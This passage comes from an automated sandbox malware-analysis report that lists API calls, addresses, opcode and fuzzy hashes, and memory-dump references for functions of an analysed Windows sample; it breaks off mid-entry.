                                                    • Opcode ID: c827e5a8cbcf67cd03c467411b18680e8b7e2560071f396255d0efa49bcdfd70
                                                    • Instruction ID: d33338dadb3570fd9343d0a75e572af542fff6185230e5d2940f610dd9ceff08
                                                    • Opcode Fuzzy Hash: c827e5a8cbcf67cd03c467411b18680e8b7e2560071f396255d0efa49bcdfd70
                                                    • Instruction Fuzzy Hash: 41018031100604EBCF248F14CE0479A37A4FFA0325F14473EF8A1A62D0DB78E951DA69
                                                    APIs
                                                    • _malloc.LIBCMT ref: 0041A434
                                                      • Part of subcall function 0041CAFE: __FF_MSGBANNER.LIBCMT ref: 0041CB21
                                                      • Part of subcall function 0041CAFE: __NMSG_WRITE.LIBCMT ref: 0041CB28
                                                      • Part of subcall function 0041CAFE: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018,0042D8B8,0000000C,0041EB7E), ref: 0041CB75
                                                    • __CxxThrowException@8.LIBCMT ref: 0041A479
                                                      • Part of subcall function 00411CF0: std::exception::exception.LIBCMT ref: 00411CFA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AllocateException@8HeapThrow_mallocstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 1264268182-0
                                                    • Opcode ID: a8dac3d06ec195d75fcf40937f560bec599dd4ce8c76009c63905e723d33cbfb
                                                    • Instruction ID: 2cbe6f0952810cab1b7a4c605eddcd8f63c12ae37312326ab4c0c0aefde95d50
                                                    • Opcode Fuzzy Hash: a8dac3d06ec195d75fcf40937f560bec599dd4ce8c76009c63905e723d33cbfb
                                                    • Instruction Fuzzy Hash: 6AF0E23164021932CF04B363EC0AADD37A46F4075CB10843BF914920A2DFFDAAD5818E
                                                    APIs
                                                    • SetFileAttributesW.KERNELBASE(00000000,00000000,771B3110,00000001,?,004090C5,00000000,?,?,004091A6,?,00000001,00000000,?,?), ref: 00408E30
                                                    • SetFileAttributesW.KERNEL32(?,00000000,00000000,?,00000800,?,004090C5,00000000,?,?,004091A6,?,00000001,00000000,?,?), ref: 00408E5D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: 84f1e129171c9cbfa5f409367bc1ff56a2615d8611c997d8403947509a78202f
                                                    • Instruction ID: 650244b6033713b21b11048f49edb8a9a08d679f9c0597073d4252fd729d8377
                                                    • Opcode Fuzzy Hash: 84f1e129171c9cbfa5f409367bc1ff56a2615d8611c997d8403947509a78202f
                                                    • Instruction Fuzzy Hash: B4F0A031151229BADF016E65CC01FDA3B5CAF083D8F088027BC84A7190DA75DDA5DAA8
                                                    APIs
                                                    • DeleteFileW.KERNELBASE(?,?,-00000011,?,00408517,?,?,00000001,?,?,?,?,?,?,?,00000000), ref: 00408E84
                                                    • DeleteFileW.KERNEL32(?,?,?,00000800,?,00408517,?,?,00000001,?,?,?,?,?,?,?), ref: 00408EAE
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: DeleteFile
                                                    • String ID:
                                                    • API String ID: 4033686569-0
                                                    • Opcode ID: 5b7b6759fab871bd7404957b698212ebf33fe4af4b1e343a5a89e0ceb06479f1
                                                    • Instruction ID: 1d1181cfb3c442f0c2b3915a874c33f451573b40ca55d1bda343f94b2a61534f
                                                    • Opcode Fuzzy Hash: 5b7b6759fab871bd7404957b698212ebf33fe4af4b1e343a5a89e0ceb06479f1
                                                    • Instruction Fuzzy Hash: 6DE0ED31552229A6DB00AA60CC01BDB3B9CAF083D1F084077BC80E3294DA75DC948AA9
                                                    APIs
                                                    • _clock.LIBCMT ref: 004109D9
                                                      • Part of subcall function 0041C29B: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,004109EA,?,?,0040B874,00000000,?,?,00412073,?,?,?), ref: 0041C2A7
                                                      • Part of subcall function 0041C29B: __aulldiv.LIBCMT ref: 0041C2D8
                                                    • _clock.LIBCMT ref: 004109E5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Time_clock$FileSystem__aulldiv
                                                    • String ID:
                                                    • API String ID: 3318706034-0
                                                    • Opcode ID: f986b46ae22b52a4316d48ee12188aa9fdaf895018720f5250c2318da952bd18
                                                    • Instruction ID: 286ba2fe7c3b0c2ef38476bb6faa1b929c2cc4fce2c5d26ce4296f7af4448982
                                                    • Opcode Fuzzy Hash: f986b46ae22b52a4316d48ee12188aa9fdaf895018720f5250c2318da952bd18
                                                    • Instruction Fuzzy Hash: 7EE0A035A0022066D72177B7B9063EE7B657B9639CF0405BFE441922A2DBBC08C25A2D
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ItemText_swprintf
                                                    • String ID:
                                                    • API String ID: 3011073432-0
                                                    • Opcode ID: 5fec1140487ca1c736cafc36fabda8fb0bb0e2233318993054084298f629e3ab
                                                    • Instruction ID: 311f314f8756c2e19301a91120922c5cc2ddf62e6e9c94aa540ea9938f79ff04
                                                    • Opcode Fuzzy Hash: 5fec1140487ca1c736cafc36fabda8fb0bb0e2233318993054084298f629e3ab
                                                    • Instruction Fuzzy Hash: 60F0E53191030876EB11FBA18C47F9A3A689705789F04057BB601B60E2E679A9708BAA
                                                    APIs
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,?,00409036,?,004065BF,?,?,?,?), ref: 00408DE1
                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,?,?,00409036,?,004065BF,?,?,?,?), ref: 00408E09
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: AttributesFile
                                                    • String ID:
                                                    • API String ID: 3188754299-0
                                                    • Opcode ID: c25cc873939ac4405c65f46b02c83e86188fc4c1d62e607194c8f75a8fe2266f
                                                    • Instruction ID: 2dfbdbc87525756de27a7cff900a7096c0f9eac0dcd58dd49e0796e607ac8402
                                                    • Opcode Fuzzy Hash: c25cc873939ac4405c65f46b02c83e86188fc4c1d62e607194c8f75a8fe2266f
                                                    • Instruction Fuzzy Hash: 15E0923661011866CB10AAA9DC01FDA379DAB8C3B5F040577BA44E32D0DAB4DDD58FE9
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,00410B24,00409D7C), ref: 00410AF5
                                                    • GetProcessAffinityMask.KERNEL32(00000000), ref: 00410AFC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: Process$AffinityCurrentMask
                                                    • String ID:
                                                    • API String ID: 1231390398-0
                                                    • Opcode ID: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
                                                    • Instruction ID: ba2c257b6bd74dd9a7249a214cce3d3c6a055986a4cb842d6934b87e46d0253d
                                                    • Opcode Fuzzy Hash: dcf7491ca214860e487e77938373b098f05fcf341780650e92e05a1f8534bf3b
                                                    • Instruction Fuzzy Hash: B9E08672B1410EA78F18ABF1DC459EF72ACEB01209700447BE503D2200EBB8E9C24669
                                                    APIs
                                                    • FreeLibrary.KERNELBASE(00000000,00000000,00438820,0040FCBD), ref: 00419C49
                                                    • FreeLibrary.KERNELBASE(?,00000000,00438820,0040FCBD), ref: 00419C53
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: FreeLibrary
                                                    • String ID:
                                                    • API String ID: 3664257935-0
                                                    • Opcode ID: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
                                                    • Instruction ID: c107808b105c149daf5e6932ca7134945d15cac4551d7c00fc89eb98d069ac6e
                                                    • Opcode Fuzzy Hash: 0d62cf78e3bdc661a2f82cba813f0a1a4c9abef6bee34bc7d64aa9ac4bab2991
                                                    • Instruction Fuzzy Hash: A9E0EC35701220DB8720AF6ADC1499AF3ECAF99B11316486AE845E3320D774EC428AA9
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ItemShowWindow
                                                    • String ID:
                                                    • API String ID: 3351165006-0
                                                    • Opcode ID: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
                                                    • Instruction ID: bb8df4f73c5df098251a309fe1c33c8504d4bfd4afe98da2c54c19901aad4cc9
                                                    • Opcode Fuzzy Hash: 4831fce4d73d936a96b8da5e650052ed61dc757b3f02978e41a04ced16bb9e28
                                                    • Instruction Fuzzy Hash: 9FC01232258201FFCB010BB0DC09D2ABFACABA4212F00CA68B8A5C0161C23AC020DB62
                                                    APIs
                                                    • GetDlgItem.USER32(?,?), ref: 00406056
                                                    • KiUserCallbackDispatcher.NTDLL(00000000), ref: 0040605D
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: CallbackDispatcherItemUser
                                                    • String ID:
                                                    • API String ID: 4250310104-0
                                                    • Opcode ID: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
                                                    • Instruction ID: 1aa957cd52260ed364119c24255e18d6411bf3cbccacf3a019d43f62ef9d5eea
                                                    • Opcode Fuzzy Hash: 10473aa6b390d4c6f4367ea588a870e2b335c57c20f02c17b48037ae3329eebf
                                                    • Instruction Fuzzy Hash: 4BC04C76508240FFCB115BA09D08C2FBFADAF98311F50C859B9A581121C636C421DB26
                                                    APIs
                                                    • ___crtCorExitProcess.LIBCMT ref: 004210B1
                                                      • Part of subcall function 0042107E: GetModuleHandleW.KERNEL32(mscoree.dll,?,004210B6,00000000,?,0041CB37,000000FF,0000001E,?,00420EB4,00000000,00000001,00000000,?,0041EAED,00000018), ref: 00421088
                                                      • Part of subcall function 0042107E: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00421098
                                                    • ExitProcess.KERNEL32 ref: 004210BA
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                    • String ID:
                                                    • API String ID: 2427264223-0
                                                    • Opcode ID: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
                                                    • Instruction ID: f9bd48d237f3f7fcae67eaf8b1950dbb8cceb07f8c1f8ff35cc01fe5c684c7f2
                                                    • Opcode Fuzzy Hash: 21a27a63abf6c3875c02e94f35324880841d9b00b93dc530bda6b4d16cfe0508
                                                    • Instruction Fuzzy Hash: 72B09B311001487FDB112F52DC098593F15DB40360B504025F80409031DF719DE3D5C5
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: bf4ac87ce319440de3cbdc02af3d6bb132a853ffd7ff8b76651f111219efe262
                                                    • Instruction ID: f888913d286be945a1139a0333e0c343961bf1ba79595c6257e0af2005621159
                                                    • Opcode Fuzzy Hash: bf4ac87ce319440de3cbdc02af3d6bb132a853ffd7ff8b76651f111219efe262
                                                    • Instruction Fuzzy Hash: 63614770505744AADB25DB75C999BEBB7E4AF05314F00497FF0AB622C3CBB82984CB19
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: e8ed12af74225a54453d37c694eca28a6228af283361f86089a81442b0e0a612
                                                    • Instruction ID: dc28d4d626c909ba28da4c541411ce0e300b2c69727a092553769846e0656262
                                                    • Opcode Fuzzy Hash: e8ed12af74225a54453d37c694eca28a6228af283361f86089a81442b0e0a612
                                                    • Instruction Fuzzy Hash: 8D31A273A042058BCB14EF69C9826EDB7F1EF95308F24446ED052E7392C739AD81CB28
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: _wcsncpy
                                                    • String ID:
                                                    • API String ID: 1735881322-0
                                                    • Opcode ID: 3c487f45cf325fdfc169150916cb0d5f0be5dcadb45b6341a8fcd8ea48b84124
                                                    • Instruction ID: 7328be185230f80c8c1b4a96cbaadf37babfc1a7a15af7408875e64807603648
                                                    • Opcode Fuzzy Hash: 3c487f45cf325fdfc169150916cb0d5f0be5dcadb45b6341a8fcd8ea48b84124
                                                    • Instruction Fuzzy Hash: DF2126306402156AEB20AA65C849BEF73AD9F05744F044037F985EB2C3E3BC9DC48798
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 0041519A
                                                      • Part of subcall function 0041A086: __lock.LIBCMT ref: 0041A0A4
                                                      • Part of subcall function 0041A086: ___sbh_find_block.LIBCMT ref: 0041A0AF
                                                      • Part of subcall function 0041A086: ___sbh_free_block.LIBCMT ref: 0041A0BE
                                                      • Part of subcall function 0041A086: RtlFreeHeap.NTDLL(00000000,00000000,0042D5E0,0000000C,0041EB44,00000000,0042D8B8,0000000C,0041EB7E,00000000,0041A52B,?,00425008,00000004,0042DAA0,0000000C), ref: 0041A0EE
                                                      • Part of subcall function 0041A086: GetLastError.KERNEL32(?,00425008,00000004,0042DAA0,0000000C,00420EFE,00000000,0041A53A,00000000,00000000,00000000,?,0041E526,00000001,00000214), ref: 0041A0FF
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ErrorFreeH_prologHeapLast___sbh_find_block___sbh_free_block__lock
                                                    • String ID:
                                                    • API String ID: 2675452811-0
                                                    • Opcode ID: 508af54376101301fb54282053f5f476b4823b58c1624c4e938049cf541abb92
                                                    • Instruction ID: cd261fae68c794ea5b57b316fd267b77e4886767f751fe688ac4ffe59fe991fa
                                                    • Opcode Fuzzy Hash: 508af54376101301fb54282053f5f476b4823b58c1624c4e938049cf541abb92
                                                    • Instruction Fuzzy Hash: F6119A70505B409AC324FF72DAA26EAF7B4AF24308F40491EF067525D2DF78BA45CA19
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 7b3dd2e5fdecf46e5de386a29542ce9eb7512626bb47aa67f4f971a9a5e50e59
                                                    • Instruction ID: c927707f8915652adcfde73a2cda552ab4301ed6ad44ab332505f1e9c900a899
                                                    • Opcode Fuzzy Hash: 7b3dd2e5fdecf46e5de386a29542ce9eb7512626bb47aa67f4f971a9a5e50e59
                                                    • Instruction Fuzzy Hash: E6F04F35B00614AFD714AF58C889FADB7B5EF48724F208599E912A73E1CB749D008A54
                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(?,771B20B0,00000000,0040841F,?,?,?,?,004071EB,?,00000000,?,00000800,?,?,?), ref: 004087E5
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.1358437110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000002.00000002.1358418740.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358469506.000000000042A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358485839.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000002.00000002.1358538575.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_400000_c3p.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 7ecf72b9a802cc8559e0326d1f4c23dd1549747322943175324f52bf2c4fec62
